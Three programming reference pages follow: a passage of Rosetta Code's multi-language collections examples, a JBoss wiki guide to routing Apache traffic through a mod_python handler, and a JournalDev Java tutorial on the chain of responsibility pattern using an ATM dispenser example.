require 'ostruct' # creating an OpenStruct ab = OpenStruct.new p ab #=> #<OpenStruct> ab.foo = 25 p ab.foo #=> 25 ab[:bar] = 2 p ab["bar"] #=> 2 p ab #=> #<OpenStruct foo=25, bar=2> ab.delete_field("foo") p ab.foo #=> nil p ab #=> #<OpenStruct bar=2> p son = OpenStruct.new({ :name => "Thomas", :age => 3 }) #=> #<OpenStruct name="Thomas", age=3> p son.name #=> "Thomas" p son[:age] #=> 3 son.age += 1 p son.age #=> 4 son.items = ["candy","toy"] p son.items #=> ["candy","toy"] p son #=> #<OpenStruct name="Thomas", age=4, items=["candy", "toy"]> Rust[edit] Rust has quite a few collections built in. Stack-allocated collections[edit] Array[edit] Arrays ( [T; N]) are stack allocated, fixed size collections of items of the same type. let a = [1u8,2,3,4,5]; // a is of type [u8; 5] let b = [0; 256]; // Equivalent to `let b = [0,0,0,0,0,0... repeat 256 times]` Slice[edit] Slices ( &[T]) are dynamically sized views into contiguous sequences (arrays, vectors, strings). let array = [1,2,3,4,5]; let slice = &array[0..2]; println!("{:?}", slice); - Output: [1, 2] String slice[edit] String slices ( str) are slices of Unicode characters. Plain strs are almost never seen in Rust. Instead either heap-allocated Strings or borrowed string slices ( &str, which is basically equivalent to a slice of bytes: &[u8]) are more often used. It should be noted that strings are not indexable as they are UTF-8 (meaning that characters are not necessarily of a fixed size); however, iterators can be created over codepoints or graphemes. Heap-allocated collections[edit] Vector[edit] Vectors ( Vec<T>) are a growable list type. According to the Rust documentation, when in doubt you want to use a Vector. let mut v = Vec::new(); v.push(1); v.push(2); v.push(3); // Or (mostly) equivalently via a convenient macro in the standard library let v = vec![1,2,3]; String[edit] Strings are growable strings stored as a UTF-8 buffer which are just Vec<u8>s under the hood.
Like strs, they are not indexable (for the same reasons) but iterators can be created over the graphemes, codepoints or bytes therein. let x = "abc"; // x is of type &str (a borrowed string slice) let s = String::from(x); // or alternatively let s = x.to_owned(); VecDeque[edit] A growable ring buffer. According to the Rust documentation you should use VecDeque<T> when: - You want a Vec that supports efficient insertion at both ends of the sequence. - You want a queue. - You want a double-ended queue (deque). Linked List[edit] A doubly-linked list. According to the Rust documentation, you should use it when: - You want a Vec or VecDeque of unknown size, and can't tolerate amortization. - You want to efficiently split and append lists. - You are absolutely certain you really, truly, want a doubly linked list. HashMap[edit] A hash map implementation which uses linear probing with Robin Hood bucket stealing. According to the Rust documentation, you should use it when: - You want to associate arbitrary keys with an arbitrary value. - You want a cache. - You want a map, with no extra functionality. BTreeMap[edit] A map based on a B-Tree. According to the Rust documentation, you should use it when: - You're interested in what the smallest or largest key-value pair is. - You want to find the largest or smallest key that is smaller or larger than something. - You want to be able to get all of the entries in order on-demand. - You want a sorted map. HashSet/BTreeSet[edit] Set implementations that use an empty tuple () as the value of their respective maps (and implement different methods). They should be used when: - You just want to remember which keys you've seen. - There is no meaningful value to associate with your keys. - You just want a set. BinaryHeap[edit] A priority queue implemented with a binary heap. You should use it when: - You want to store a bunch of elements, but only ever want to process the "biggest" or "most important" one at any given time.
- You want a priority queue. Scala[edit] Scala has in its run-time library a rich set of collections. Due to the use of traits, this library is easily realized and consistent. Collections provide the same operations on any type where it makes sense to do so. For instance, a string is conceptually a sequence of characters. Consequently, in Scala collections, strings support all sequence operations. The same holds for arrays. The collections are available in two flavors: immutable (these have no methods to modify or update) and mutable. With these properties they are also available in concurrent versions for parallel processing. Switching between sequential and parallel can easily be done by adding a .seq or .par postfix. These examples were taken from a Scala REPL session. The second lines are the REPL responses. Windows PowerShell PS C:\Users\FransAdm> scala Welcome to Scala version 2.10.1 (Java HotSpot(TM) 64-Bit Server VM, Java 1.7.0_25). Type in expressions to have them evaluated. Type :help for more information. scala> // Immutable collections do not and cannot change the instantiated object scala> // Let's start with Lists scala> val list = Nil // Empty List list: scala.collection.immutable.Nil.type = List() scala> val list2 = List("one", "two") // List with two elements (Strings) list2: List[String] = List(one, two) scala> val list3 = 3 :: list2 // prepend 3 to list2, using a special operator list3: List[Any] = List(3, one, two) scala> // The result was a mixture of an Int and Strings, so the common superclass Any is used.
scala> // Let's test the Set collection scala> val set = Set.empty[Char] // Empty Set of Char type set: scala.collection.immutable.Set[Char] = Set() scala> val set1 = set + 'c' // add an element set1: scala.collection.immutable.Set[Char] = Set(c) scala> val set2 = set + 'a' + 'c' + 'c' // try to add another and the same element twice set2: scala.collection.immutable.Set[Char] = Set(a, c) scala> // Let's look at the most universal map: TrieMap (Cache-aware lock-free concurrent hash trie) scala> val capital = collection.concurrent.TrieMap("US" -> "Washington", "France" -> "Paris") // This map is mutable capital: scala.collection.concurrent.TrieMap[String,String] = TrieMap(US -> Washington, France -> Paris) scala> capital - "France" // This is only an expression, does not modify the map itself res0: scala.collection.concurrent.TrieMap[String,String] = TrieMap(US -> Washington) scala> capital += ("Tokio" -> "Japan") // Adding an element, object is changed - not the val capital res1: capital.type = TrieMap(US -> Washington, Tokio -> Japan, France -> Paris) scala> capital // Check what we have so far res2: scala.collection.concurrent.TrieMap[String,String] = TrieMap(US -> Washington, Tokio -> Japan, France -> Paris) scala> val queue = new scala.collection.mutable.Queue[String] queue: scala.collection.mutable.Queue[String] = Queue() scala> queue += "first" res17: queue.type = Queue("first") scala> queue += "second" res19: queue.type = Queue("first", "second") scala> import collection.concurrent.TrieMap // super concurrent mutable hashmap val map = TrieMap("Amsterdam" -> "Netherlands", "New York" -> "USA", "Heemstede" -> "Netherlands") map("Laussanne") = "Switzerland" // 2 Ways of updating map += ("Tokio" -> "Japan") assert(map("New York") == "USA") assert(!map.isDefinedAt("Gent")) // isDefinedAt is false assert(map.isDefinedAt("Laussanne")) // true val hash = new TrieMap[Int, Int] hash(1) = 2 hash += (1 -> 2) // same as hash(1) = 2 hash += (3 -> 4, 5 -> 6, 44 -> 99) hash(44)
// 99
hash.contains(33)    // false
hash.isDefinedAt(33) // same as contains
hash.contains(44)    // true

// iterate over key/value pairs; each element is a two-element tuple
hash.foreach { e => println("key " + e._1 + " value " + e._2) }
// same with for syntax
for ((k, v) <- hash) println("key " + k + " value " + v)

// items in hash where the key is greater than 3
hash.filter { e => e._1 > 3 } // Map(5 -> 6, 44 -> 99)
// same with for syntax
for ((k, v) <- hash; if k > 3) yield (k, v)

Scheme

list

(list obj ...) returns a newly allocated list of its arguments.

Example:

(display (list 1 2 3))
(newline)
(display (list))
(newline)

- Output:
(1 2 3)
()

cons

(cons obj lst) returns a newly allocated list consisting of obj prepended to lst.

Example:

(display (cons 0 (list 1 2 3)))
(newline)

- Output:
(0 1 2 3)

append

(append lst ...) returns a newly allocated list consisting of the elements of lst followed by the elements of the other lists.

Example:

(display (append (list 1 2 3) (list 4 5 6)))
(newline)

- Output:
(1 2 3 4 5 6)

Seed7

set

$ include "seed7_05.s7i";
  enable_output(set of string);

const proc: main is func
  local
    var set of string: aSet is {"iron", "copper"};
  begin
    writeln(aSet);
    incl(aSet, "silver");
    writeln(aSet);
  end func;

array

$ include "seed7_05.s7i";

const proc: main is func
  local
    var array string: anArray is [] ("iron", "copper");
    var string: element is "";
  begin
    for element range anArray do
      write(element <& " ");
    end for;
    writeln;
    anArray &:= "silver";
    for element range anArray do
      write(element <& " ");
    end for;
    writeln;
  end func;

hash

$ include "seed7_05.s7i";

const type: aHashType is hash [string] string;

const proc: main is func
  local
    var aHashType: aHash is aHashType.value;
    var string: aValue is "";
    var string: aKey is "";
  begin
    aHash @:= ["gold"] "metal";
    aHash @:= ["helium"] "noble gas";
    for aValue key aKey range aHash do
      writeln(aKey <& ": " <& aValue);
    end for;
  end func;

Setl4

Set

set =
new('set 5 10 15 20 25 25')
add(set,30)
show(set)
show.eval('member(set,5)')
show.eval('member(set,6)')
show.eval("exists(set,'eq(this,10)')")
show.eval("forall(set,'eq(this,40)')")

Iter

iter = new('iter 1 10 2')
show(iter)
show.eval("eq(set.size(iter),5)")
show.eval('member(iter,5)')

Map

map = new('map one:1 two:2 ten:10 forty:40 hundred:100 thousand:1000')
show(map)
show.eval("eq(get(map,'one'),1)")
show.eval("eq(get(map,'one'),6)")
show.eval("exists(map,'eq(get(map,this),2)')")
show.eval("forall(map,'eq(get(map,this),2)')")

Sidef

Array

Arrays are ordered, integer-indexed collections of any object.

# creating an empty array and adding values
var a = []   #=> []
a[0] = 1     #=> [1]
a[3] = "abc" #=> [1, nil, nil, "abc"]
a << 3.14    #=> [1, nil, nil, "abc", 3.14]

Hash

A Hash is a dictionary-like collection of unique keys and their values. Also called associative arrays, they are similar to Arrays, but where an Array uses integers as its index, a Hash allows you to use any object type, which is automatically converted into a String.

# creating an empty hash
var h = Hash()  #=> Hash()
h{:foo} = 1     #=> Hash("foo"=>1)
h{:bar} = 2.4   #=> Hash("foo"=>1, "bar"=>2.4)
h{:bar} += 3    #=> Hash("foo"=>1, "bar"=>5.4)

Pair

A Pair is an array-like collection, but restricted only to two elements.

# create a simple pair
var p = Pair('a', 'b')
say p.first;  #=> 'a'
say p.second; #=> 'b'

# create a pair of pairs
var pair = 'foo':'bar':'baz':();  # => Pair('foo', Pair('bar', Pair('baz', nil)))

# iterate over the values of a pair of pairs
loop {
    say pair.first;  #=> 'foo', 'bar', 'baz'
    pair = pair.second;
    pair == nil && break;
}

Struct

A Struct is a convenient way to bundle a number of attributes together.

# creating a struct
struct Person {
    String name,
    Number age,
    String sex,
}

var a = Person("John Smith", 41, :man)
a.age += 1               # increment age
a.name = "Dr. #{a.name}" # update name

say a.name #=> "Dr.
John Smith"
say a.age  #=> 42
say a.sex  #=> "man"

Slate

{1. 2. 3. 4. 5} collect: [|:x| x + 1]. "--> {2. 3. 4. 5. 6}"
{1. 2. 3. 4. 5} select: #isOdd `er. "--> {1. 3. 5}"
({3. 2. 7} collect: #+ `er <- 3) sort. "--> {"SortedArray traitsWindow" 5. 6. 10}"
ExtensibleArray new `>> [addLast: 3. addFirst: 4. ]. "--> {"ExtensibleArray traitsWindow" 4. 3}"

Smalltalk

Smalltalk has several collection classes (indeed the class Collection is the parent of a long list of subclasses), the word collection being rather generic (an array indexed by integers is a collection too, and in some languages it's the only primitive collection available). This code shows how to add elements (which for each collection kind can be mixed) to five kinds of Smalltalk collection:

- OrderedCollection: elements are kept in the order they are added;
- Bag: for each element, a count of how many times it appears is kept. Objects appear only once, but we can know how many of each we added to the bag;
- Set: a set. Elements appear only once; adding an existing object won't change the set. If we want to know whether we added the same object several times, we use a Bag;
- SortedCollection: elements are sorted (every comparable object can be added, and if we want a different sorting criterion, we can supply a custom comparator through sortBlock);
- Dictionary: objects are indexed by an arbitrary key, e.g. a string.

|anOrdered aBag aSet aSorted aSorted2 aDictionary|
anOrdered := OrderedCollection new.
anOrdered add: 1; add: 5; add: 3.
anOrdered printNl.

aBag := Bag new.
aBag add: 5; add: 5; add: 5; add: 6.
aBag printNl.

aSet := Set new.
aSet add: 10; add: 5; add: 5; add: 6; add: 10.
aSet printNl.

aSorted := SortedCollection new.
aSorted add: 10; add: 9; add: 8; add: 5.
aSorted printNl.

"another sorted collection with a custom comparator: let's sort the other
 collections according to their size (number of elements)"
aSorted2 := SortedCollection sortBlock: [ :a :b | (a size) < (b size) ].
aSorted2 add: anOrdered; add: aBag; add: aSet; add: aSorted.
aSorted2 printNl.

aDictionary := Dictionary new.
aDictionary at: 'OrderedCollection' put: anOrdered;
            at: 'Bag' put: aBag;
            at: 'Set' put: aSet;
            at: 'SortedCollection' put: { aSorted. aSorted2 }.
aDictionary printNl.

Output:

OrderedCollection (1 5 3 )
Bag(5:3 6:1 )
Set (10 5 6 )
SortedCollection (5 8 9 10 )
SortedCollection (Set (10 5 6 ) OrderedCollection (1 5 3 ) Bag(5:3 6:1 ) SortedCollection (5 8 9 10 ) )
Dictionary (
 'SortedCollection'->(SortedCollection (5 8 9 10 ) SortedCollection (Set (10 5 6 ) OrderedCollection (1 5 3 ) Bag(5:3 6:1 ) SortedCollection (5 8 9 10 ) ) )
 'OrderedCollection'->OrderedCollection (1 5 3 )
 'Set'->Set (10 5 6 )
 'Bag'->Bag(5:3 6:1 )
)

Tcl

Tcl has 3 fundamental collection types: list, array and dictionary. A Tcl list is what other languages call an array (an integer-indexed list of values).

set c [list] ;# create an empty list
# fill it
lappend c 10 11 13
set c [linsert $c 2 "twelve goes here"]
# iterate over it
foreach elem $c {puts $elem}
# pass to a proc
proc show_size {l} {
    puts [llength $l]
}
show_size $c

A Tcl array is an associative array (aka hash). Arrays are collections of variables indexable by name, not collections of values. An array cannot be passed to a procedure by value: it must either be passed by name or by its serialized representation. Tcl arrays are also strictly one-dimensional: arrays cannot be nested. However, multi-dimensional arrays can be simulated with cleverly constructed key strings.
# create an empty array
array set h {}
# add some pairs
set h(one) 1
set h(two) 2
# add more data
array set h {three 3 four 4 more {5 6 7 8}}
# iterate over it in a couple of ways
foreach key [array names h] {puts "$key -> $h($key)"}
foreach {key value} [array get h] {puts "$key -> $value"}
# pass by name
proc numkeys_byname {arrayName} {
    upvar 1 $arrayName arr
    puts "array $arrayName has [llength [array names arr]] keys"
}
numkeys_byname h
# pass serialized
proc numkeys_bycopy {l} {
    array set arr $l
    puts "array has [llength [array names arr]] keys"
}
numkeys_bycopy [array get h]

A Tcl dictionary is an associative array value that contains other values. Hence dictionaries can be nested, and arbitrarily deep data structures can be created.

# create an empty dictionary
set d [dict create]
dict set d one 1
dict set d two 2
# create another
set e [dict create three 3 four 4]
set f [dict merge $d $e]
dict set f nested [dict create five 5 more [list 6 7 8]]
puts [dict get $f nested more] ;# ==> 6 7 8

TUSCRIPT

$$ MODE TUSCRIPT
collection=*
DATA apple
DATA banana
DATA orange

morestuff=*
DATA peaches
DATA apple

collection=APPEND(collection,morestuff)
TRACE *collection

Output:

collection = *
1 = apple
2 = banana
3 = orange
4 = peaches
5 = apple

UNIX Shell

"Advanced" Unix shells have indexed array and associative array collections.
Indexed arrays

a_index=(one two three)  # create an array with a few elements
a_index+=(four five)     # append some elements
a_index[9]=ten           # add at a specific index
for elem in "${a_index[@]}"; do  # iterate over the elements
    echo "$elem"
done
for idx in "${!a_index[@]}"; do  # iterate over the array indices
    printf "%d\t%s\n" $idx "${a_index[idx]}"
done

Associative arrays

declare -A a_assoc=([one]=1 [two]=2 [three]=3)  # create an array with a few elements
a_assoc+=([four]=4 [five]=5)                    # add some elements
a_assoc[ten]=10
for value in "${a_assoc[@]}"; do  # iterate over the values
    echo "$value"
done
for key in "${!a_assoc[@]}"; do   # iterate over the array indices
    printf "%s\t%s\n" "$key" "${a_assoc[$key]}"
done

(In some shells, change declare -A to typeset -A.)

Ursala

There are several kinds of collections in Ursala that are supported by having their own operators and type constructors associated with them. All storage is immutable, but one may "add" to a collection by invoking a function that returns a new collection from it. The examples shown below populate the collections with primitive types expressed literally, but they could also be aggregate or abstract types, functions, symbolic names or expressions.

Lists

Lists are written as comma-separated sequences enclosed in angle brackets, or with the head and tail separated by a colon.

x = <1,5,6>
y = <'foo','bar'>
z = 3:<6,8>

This function takes a pair of a new head and an existing list, and returns one that has the new head "added" to it.

foo ("newhead","existing-list") = "newhead":"existing-list"

Sets

Sets are comma-separated sequences enclosed in braces. The order and multiplicities of elements are ignored, so that the following declarations are equivalent.

x = {'a','b'}
y = {'b','a'}
z = {'a','b','a'}

Modules

Modules are lists in a particular form used to represent key:value pairs, with the key being a character string.
m = <'foo': 1,'bar': 2,'baz': 3>

A module or any list of pairs can be reified into a function (a.k.a. a hash or finite map) and used in any context where a function is usable, assuming the keys are mutually distinct.

Trees

Trees are written in the form r^:s, where r is the root and s is a list of subtrees, which can be of any length.

x = 'z'^: <
   'x'^: <
      '7'^: <>,
      '?'^: <'D'^: <>>>,
   'a'^: <'E'^: <>,'j'^: <>>,
   'b'^: <'i'^: <>>,
   'c'^: <>>

A-trees

A-trees allow faster access than trees by using a different representation wherein data are stored only in the leaves at a constant depth.

x = [
   4:0: 'foo',
   4:1: 'bar',
   4:2: 'baz',
   4:3: 'volta',
   4:4: 'pramim']

Grids

Grids are similar to lists of A-trees satisfying certain additional invariants. They represent a rooted, directed graph in which the nodes are partitioned by levels and edges exist only between nodes in consecutive levels. This type of data structure is ubiquitous in financial derivatives applications. This example shows a grid of floating point numbers. The colon-separated numbers (e.g., 4:10) are used in grids of any type as addresses, with each node including a list of the addresses of its descendants in the next level.

g = <
   [0:0: -9.483639e+00^: <4:10,4:14>],
   [
      4:14: -9.681900e+00^: <4:15>,
      4:10: 2.237330e+00^: <4:7>],
   [
      4:15: -2.007562e+00^: <5:5>,
      4:7: 2.419021e+00^: <5:5,5:15>],
   [
      5:15: 8.215451e+00^: <11:118>,
      5:5: 4.067704e+00^: <11:741>],
   [
      11:741: -7.608967e+00^: <8:68>,
      11:118: -1.552837e+00^: <8:68,8:208>],
   [
      8:208: 5.348115e+00^: <4:7,4:9,4:12>,
      8:68: -9.066821e+00^: <4:9,4:12>],
   [
      4:12: -3.460494e+00^: <>,
      4:9: 2.840319e+00^: <>,
      4:7: -2.181140e+00^: <>]>

V

A quote is used for the same purpose in V.

[4 3 2 1]
5 swap cons
=[5 4 3 2 1]

Vim Script

Vim Script has two collection types: List and Dictionary. See Arrays for basic operations on a List and Associative_array/Creation for basic operations on a Dictionary.
VBA

VBA has a built-in collection type.

Dim coll As New Collection
coll.Add "apple"
coll.Add "banana"

Visual Basic .NET

Dim toys As New List(Of String)
toys.Add("Car")
toys.Add("Boat")
toys.Add("Train")

Visual FoxPro

Visual FoxPro has a built-in Collection class.

LOCAL loColl As Collection, o, a1, a2, a3
a1 = CREATEOBJECT("animal", "dog", 4)
a2 = CREATEOBJECT("animal", "chicken", 2)
a3 = CREATEOBJECT("animal", "snake", 0)
loColl = NEWOBJECT("Collection")
loColl.Add(a1)
loColl.Add(a2)
loColl.Add(a3)
FOR EACH o IN loColl FOXOBJECT
    ? o.Name, o.Legs
ENDFOR

DEFINE CLASS animal As Custom
    Legs = 0
    PROCEDURE Init(tcName, tnLegs)
        THIS.Name = tcName
        THIS.Legs = tnLegs
    ENDPROC
ENDDEFINE

Wren

Wren has only Map (hash) and List (array).

var list = []  // empty list
list = [1,2,3,4]
list.add(5)
list.clear()
list = [0] * 10
list.count  // 10

var map = {}
map["key"] = "value"
map[3] = 31
map.count  // 2
map.clear()
for (e in map.keys) {
    // Do stuff
}

zkl

Lists:

L(1,2,3).append(4); //-->L(1,2,3,4), mutable list

Read-only list:

ROList(1,2,3).append(4); // creates two lists

Bit bucket:

Data(0,Int,1,2,3) // three bytes

The "Int" means treat contents as a byte stream.

Data(0,Int,"foo ","bar")            //-->7 bytes
Data(0,Int,"foo ").append("bar")    // ditto
Data(0,Int,"foo\n","bar").readln()  //-->"foo\n"
Data(0,String,"foo ","bar")         //-->9 bytes (2 \0s)
Data(0,String,"foo ").append("bar").readln() //-->"foo "
http://rosettacode.org/wiki/Collections
It's nice to have URLs that look something like this:

...rather than like this:

It's more aesthetic, and it means you can rename your blog script, or use Perl instead of Python. But it's hard to do that, because you have to rework the directory structure. This page tells how to handle the directories yourself, taking that work over from Python. The best news is: you don't even have to touch ModRewrite!

The basic idea is: do an InternalRedirect for all traffic on a VirtualHost to your script. In the script, ask Apache for the previous RequestObject's URI.

This page assumes mod_python. If you're not using mod_python, read what you can, and it may give you hints about how to do this with your own configuration.

== Redirect Traffic ==

Assuming you have ModPython set up, add the following lines to the VirtualHost entry:

PythonPath "sys.path+['/var/www/path/to/your/script/directory/']"
AddHandler python-program .py
PythonPostReadRequestHandler allrqst
PythonDebug on

(I don't know that all of this is necessary. Someone more expert than me can correct this.)

The most important line here is "PythonPostReadRequestHandler." That means that, when a request comes in, before anything is done with it, it will be sent to the "allrqst" module. The "allrqst" module will be in /var/www/path/to/your/script/directory/.

Make the file "allrqst.py" in that directory, and have it read:

from mod_python import apache

def postreadrequesthandler(req):
    if req.uri != "/blog.py":
        req.internal_redirect("/blog.py")
    return apache.OK

That's it! That will redirect ALL TRAFFIC to your script, /blog.py, regardless of URI. But we're not done yet - we still want to have access to that old URI.

== Ask Apache for the Previous URI ==

First, you need to tell Apache how to find blog.py. In the VirtualHost directive, add:

<Directory "/var/www/path/to/your/script/directory/">
    AddHandler python-program .py
    PythonHandler blog
    PythonDebug on
</Directory>

Then have the code for "blog.py" print the old URI.
from mod_python import apache

def handler(req):
    req.write("Old URI: " + req.prev.uri)
    return apache.OK

== Summary ==

So, the basic idea is: do an InternalRedirect for all traffic on a VirtualHost to your script. In the script, ask Apache for the previous RequestObject's URI.

== Questions ==

Can you do the InternalRedirect without dropping into mod_python, mod_perl, or anything else? Can you just use a normal Configuration Directive?
https://developer.jboss.org/wiki/ApacheHandlingDirectoriesYourself
Chain of responsibility design pattern is one of the behavioral design patterns.

Table of Contents

- 1 Chain of Responsibility Design Pattern
  - 1.1 Chain of Responsibility Pattern Example in JDK
  - 1.2 Chain of Responsibility Design Pattern Example
  - 1.3 Chain of Responsibility Design Pattern – Base Classes and Interface
  - 1.4 Chain of Responsibilities Pattern – Chain Implementations
  - 1.5 Chain of Responsibilities Design Pattern – Creating the Chain
  - 1.6 Chain of Responsibilities Design Pattern Class Diagram
  - 1.7 Chain of Responsibility Design Pattern Important Points
  - 1.8 Chain of Responsibility Pattern Examples in JDK

Chain of Responsibility Design Pattern

The chain of responsibility pattern is used to achieve loose coupling in software design, where a request from the client is passed to a chain of objects to process it. The objects in the chain decide themselves who will process the request and whether the request needs to be sent to the next object in the chain or not.

Chain of Responsibility Pattern Example in JDK

Let's see an example of the chain of responsibility pattern in the JDK, and then we will proceed to implement a real-life example of this pattern. We know that we can have multiple catch blocks in a try-catch code block. Here every catch block is a kind of processor that handles one particular exception type. So when an exception occurs in the try block, it's sent to the first catch block to process. If that catch block is not able to process it, the request is forwarded to the next object in the chain, i.e. the next catch block. If even the last catch block is not able to process it, the exception is thrown outside of the chain to the calling program.

Chain of Responsibility Design Pattern Example

One of the great examples of the Chain of Responsibility pattern is an ATM dispense machine. The user enters the amount to be dispensed and the machine dispenses the amount in terms of defined currency bills such as 50$, 20$, 10$ etc.
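The try/catch chaining described above can be made concrete with a small, self-contained sketch. This is illustrative code only (the class and method names are mine, not from the JDK or this article): each catch block acts as one handler in the chain, ordered from most specific to most general.

```java
public class CatchChainDemo {

    // Runs the action and reports which "handler" (catch block) dealt with it.
    static String classify(Runnable action) {
        try {
            action.run();
            return "no exception";
        } catch (ArithmeticException e) {   // first handler in the chain
            return "handled by ArithmeticException block";
        } catch (RuntimeException e) {      // next, broader handler
            return "handled by RuntimeException block";
        }
        // anything not caught here would propagate out of the chain to the caller
    }

    public static void main(String[] args) {
        System.out.println(classify(() -> { int x = 1 / 0; }));              // arithmetic
        System.out.println(classify(() -> { throw new IllegalStateException(); })); // runtime
        System.out.println(classify(() -> {}));                              // nothing thrown
    }
}
```

Note that the compiler enforces the same ordering rule the pattern implies: the more specific handler must come before the broader one, or the specific catch block becomes unreachable.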
If the user enters an amount that is not a multiple of 10, the machine throws an error. We will use the Chain of Responsibility pattern to implement this solution. The chain will process the request in the same order as in the image below.

Note that we could easily implement this solution in a single program, but then the complexity would increase and the solution would be tightly coupled. So we will create a chain of dispense systems to dispense bills of 50$, 20$ and 10$.

Chain of Responsibility Design Pattern – Base Classes and Interface

We can create a class Currency that will store the amount to dispense and be used by the chain implementations.

Currency.java

package com.journaldev.design.chainofresponsibility;

public class Currency {

	private int amount;

	public Currency(int amt){
		this.amount=amt;
	}

	public int getAmount(){
		return this.amount;
	}
}

The base interface should have a method to define the next processor in the chain and the method that will process the request. Our ATM Dispense interface will look like below.

DispenseChain.java

package com.journaldev.design.chainofresponsibility;

public interface DispenseChain {

	void setNextChain(DispenseChain nextChain);

	void dispense(Currency cur);
}

Chain of Responsibilities Pattern – Chain Implementations

We need to create different processor classes that will implement the DispenseChain interface and provide implementations of the dispense method. Since we are developing our system to work with three types of currency bills – 50$, 20$ and 10$ – we will create three concrete implementations.
Dollar50Dispenser.java

package com.journaldev.design.chainofresponsibility;

public class Dollar50Dispenser implements DispenseChain {

	private DispenseChain chain;

	@Override
	public void setNextChain(DispenseChain nextChain) {
		this.chain=nextChain;
	}

	@Override
	public void dispense(Currency cur) {
		if(cur.getAmount() >= 50){
			int num = cur.getAmount()/50;
			int remainder = cur.getAmount() % 50;
			System.out.println("Dispensing "+num+" 50$ note");
			if(remainder !=0) this.chain.dispense(new Currency(remainder));
		}else{
			this.chain.dispense(cur);
		}
	}
}

Dollar20Dispenser.java

package com.journaldev.design.chainofresponsibility;

public class Dollar20Dispenser implements DispenseChain{

	private DispenseChain chain;

	@Override
	public void setNextChain(DispenseChain nextChain) {
		this.chain=nextChain;
	}

	@Override
	public void dispense(Currency cur) {
		if(cur.getAmount() >= 20){
			int num = cur.getAmount()/20;
			int remainder = cur.getAmount() % 20;
			System.out.println("Dispensing "+num+" 20$ note");
			if(remainder !=0) this.chain.dispense(new Currency(remainder));
		}else{
			this.chain.dispense(cur);
		}
	}
}

Dollar10Dispenser.java

package com.journaldev.design.chainofresponsibility;

public class Dollar10Dispenser implements DispenseChain {

	private DispenseChain chain;

	@Override
	public void setNextChain(DispenseChain nextChain) {
		this.chain=nextChain;
	}

	@Override
	public void dispense(Currency cur) {
		if(cur.getAmount() >= 10){
			int num = cur.getAmount()/10;
			int remainder = cur.getAmount() % 10;
			System.out.println("Dispensing "+num+" 10$ note");
			if(remainder !=0) this.chain.dispense(new Currency(remainder));
		}else{
			this.chain.dispense(cur);
		}
	}
}

The important point to note here is the implementation of the dispense method. You will notice that every implementation tries to process the request and, based on the amount, it might process part or all of it. If one of the links in the chain is not able to process the request fully, it sends the remainder to the next processor in the chain.
If the processor is not able to process anything, it just forwards the same request to the next chain.

Chain of Responsibilities Design Pattern – Creating the Chain

This is a very important step, and we should create the chain carefully, otherwise a processor might not receive any requests at all. For example, in our implementation, if we make Dollar10Dispenser the first processor in the chain and put Dollar20Dispenser after it, then the request will never be forwarded to the second processor and the chain will become useless.

Here is our ATM Dispenser implementation to process the user-requested amount.

ATMDispenseChain.java

package com.journaldev.design.chainofresponsibility;

import java.util.Scanner;

public class ATMDispenseChain {

	private DispenseChain c1;

	public ATMDispenseChain() {
		// initialize the chain
		this.c1 = new Dollar50Dispenser();
		DispenseChain c2 = new Dollar20Dispenser();
		DispenseChain c3 = new Dollar10Dispenser();

		// set the chain of responsibility
		c1.setNextChain(c2);
		c2.setNextChain(c3);
	}

	public static void main(String[] args) {
		ATMDispenseChain atmDispenser = new ATMDispenseChain();
		while (true) {
			int amount = 0;
			System.out.println("Enter amount to dispense");
			Scanner input = new Scanner(System.in);
			amount = input.nextInt();
			if (amount % 10 != 0) {
				System.out.println("Amount should be in multiple of 10s.");
				return;
			}
			// process the request
			atmDispenser.c1.dispense(new Currency(amount));
		}
	}
}

When we run the above application, we get output like below.

Enter amount to dispense
530
Dispensing 10 50$ note
Dispensing 1 20$ note
Dispensing 1 10$ note
Enter amount to dispense
100
Dispensing 2 50$ note
Enter amount to dispense
120
Dispensing 2 50$ note
Dispensing 1 20$ note
Enter amount to dispense
15
Amount should be in multiple of 10s.

Chain of Responsibilities Design Pattern Class Diagram

Our ATM dispense example of the chain of responsibility design pattern implementation looks like the image below.
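The chain-ordering pitfall described above (putting Dollar10Dispenser first) can be demonstrated with a small standalone sketch. These are hypothetical classes of my own, not the article's; a single parameterized dispenser stands in for the three concrete classes so both orderings can be compared side by side.

```java
import java.util.ArrayList;
import java.util.List;

// One handler per note denomination; `next` is the rest of the chain (may be null).
class NoteDispenser {
    private final int note;
    private final NoteDispenser next;

    NoteDispenser(int note, NoteDispenser next) { this.note = note; this.next = next; }

    // Collects "numxnote$" entries instead of printing, so the result is easy to inspect.
    void dispense(int amount, List<String> out) {
        int num = amount / note;
        if (num > 0) out.add(num + "x" + note + "$");
        int remainder = amount % note;
        if (remainder > 0 && next != null) next.dispense(remainder, out);
    }
}

public class ChainOrderDemo {
    // Builds a chain in the given note order and runs one request through it.
    static List<String> run(int amount, int... notes) {
        NoteDispenser chain = null;
        for (int i = notes.length - 1; i >= 0; i--) {
            chain = new NoteDispenser(notes[i], chain);
        }
        List<String> out = new ArrayList<>();
        chain.dispense(amount, out);
        return out;
    }

    public static void main(String[] args) {
        // correct order: largest note first
        System.out.println(run(80, 50, 20, 10)); // [1x50$, 1x20$, 1x10$]

        // wrong order: the 10$ dispenser satisfies every request by itself,
        // so the 20$ and 50$ dispensers never see any work
        System.out.println(run(80, 10, 20, 50)); // [8x10$]
    }
}
```

With the 10$ handler first, nothing in the program crashes; the chain is simply useless beyond its first link, which is why this ordering bug is easy to miss.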
Chain of Responsibility Design Pattern Important Points

- The client doesn't know which part of the chain will process the request; it just sends the request to the first object in the chain. For example, in our program ATMDispenseChain is unaware of who is processing the request to dispense the entered amount.
- Each object in the chain has its own implementation to process the request, either fully or partially, or to send it to the next object in the chain.
- Every object in the chain should have a reference to the next object in the chain to forward the request to; this is achieved by Java composition.
- Creating the chain carefully is very important, otherwise there might be a case where the request is never forwarded to a particular processor, or no object in the chain is able to handle the request. In my implementation, I have added a check on the user-entered amount to make sure it gets processed fully by all the processors, but we might instead skip that check and throw an exception if the request reaches the last object and there are no further objects in the chain to forward it to. This is a design decision.
- The Chain of Responsibility design pattern is good for achieving loose coupling, but it comes with the trade-off of having a lot of implementation classes, and maintenance problems if most of the code is common to all the implementations.

Chain of Responsibility Pattern Examples in JDK

- java.util.logging.Logger#log()
- javax.servlet.Filter#doFilter()

That's all for the Chain of Responsibility design pattern. I hope you liked it and that it clears up your understanding of this design pattern.

Comments

Trying to understand; help and assistance is needed. Thank you

Hi Pankaj, great tutorials. Please keep going with your tutorials, because they are very useful and educational. I have a question, however: how would this work the same way, but with only 20$ and 50$ denominations? Any hint?
Thank you

